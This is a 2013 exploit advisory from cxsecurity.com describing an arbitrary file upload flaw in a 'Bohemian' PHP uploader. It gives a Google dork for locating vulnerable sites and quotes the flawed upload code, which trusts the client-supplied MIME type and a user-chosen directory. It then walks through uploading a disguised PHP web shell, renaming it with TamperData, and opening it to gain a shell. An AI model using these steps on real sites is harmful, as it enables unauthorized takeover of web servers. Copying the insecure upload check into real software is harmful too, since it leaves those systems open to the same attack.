Bohemian Arbitary File Upload

2013.02.08
Credit: NEt_Bomber
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:\"CURRENT FILES:\" inurl:uploads.php

########## ### Exploit Title: "Bohemian Arbitary File Upload ### Author: NEt_Bomber ### Contact: http://facebook.com/net.bomba ### Software Link: http://bohemiawebsites.com/component/option,com_jdownloads/Itemid,382/cid,71/task,view.download/ ### Google Dork:intext:"CURRENT FILES:" inurl:uploads.php ### Tested on: Linux/Windows ########## #POC: Allowed types: " if (($_FILES[$myfile_uploadname]['type'] == "application/pdf" || $_FILES[$myfile_uploadname]['type'] == "application/vnd.openxmlformats-officedocument.wordprocessingml.document" || $_FILES[$myfile_uploadname]['type'] == "application/zip" || $_FILES[$myfile_uploadname]['type'] == "application/x-zip" || $_FILES[$myfile_uploadname]['type'] == "application/x-zip-compressed" || $_FILES[$myfile_uploadname]['type'] == "application/multipart/x-zip" || $_FILES[$myfile_uploadname]['type'] == "application/application/x-compress" || $_FILES[$myfile_uploadname]['type'] == "application/application/x-compressed" || $_FILES[$myfile_uploadname]['type'] == "application/application/octet-stream" || $_FILES[$myfile_uploadname]['type'] == "text/xml" || $_FILES[$myfile_uploadname]['type'] == "text/plain" || $_FILES[$myfile_uploadname]['type'] == "text/html" || $_FILES[$myfile_uploadname]['type'] == "text/css" || $_FILES[$myfile_uploadname]['type'] == "application/x-javascript" || $_FILES[$myfile_uploadname]['type'] == "image/jpeg" || $_FILES[$myfile_uploadname]['type'] == "image/pjpeg" || $_FILES[$myfile_uploadname]['type'] == "image/jpg" || $_FILES[$myfile_uploadname]['type'] == "image/pjpg" || $_FILES[$myfile_uploadname]['type'] == "image/gif" || $_FILES[$myfile_uploadname]['type'] == "image/x-png" ) && ($_FILES["image_upload_box"]["size"] < 1100000)){ " Upload: "if (move_uploaded_file($_FILES[$myfile_uploadname]['tmp_name'], "$directory/$name")) { ....." #EXPLOIT Upload ur shell.php.jpg than tamper filename with TamperData so u complete dataPost with PHP extension :D U can specify Upload folder ===> "if($_POST['dir']) { $directory = $_POST['dir'];" Or just leave the form blank n it'll upload it to current directory(recommended) ====> " else { $directory= getcwd();}" when its finished go back to uploader n ur shellname.php will show up in Files list below the uploader ======> $files1 = scandir($dir); foreach($files1 as $file){ if(strlen($file) >=3){ $foil = strstr($file, 'css'); // As of PHP 5.3.0 //$pos = strpos($file, 'css'); //if ($foil==true){ echo $file."<br/>"; Then just go to uploader url : http://$host/$path/shellname.php and u got ur shell ;) #Demo : http://data.imagup.com/10/1174922149.JPG Done!

References:

http://data.imagup.com/10/1174922149.JPG
http://bohemiawebsites.com/component/option,com_jdownloads/Itemid,382/cid,71/task,view.download/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top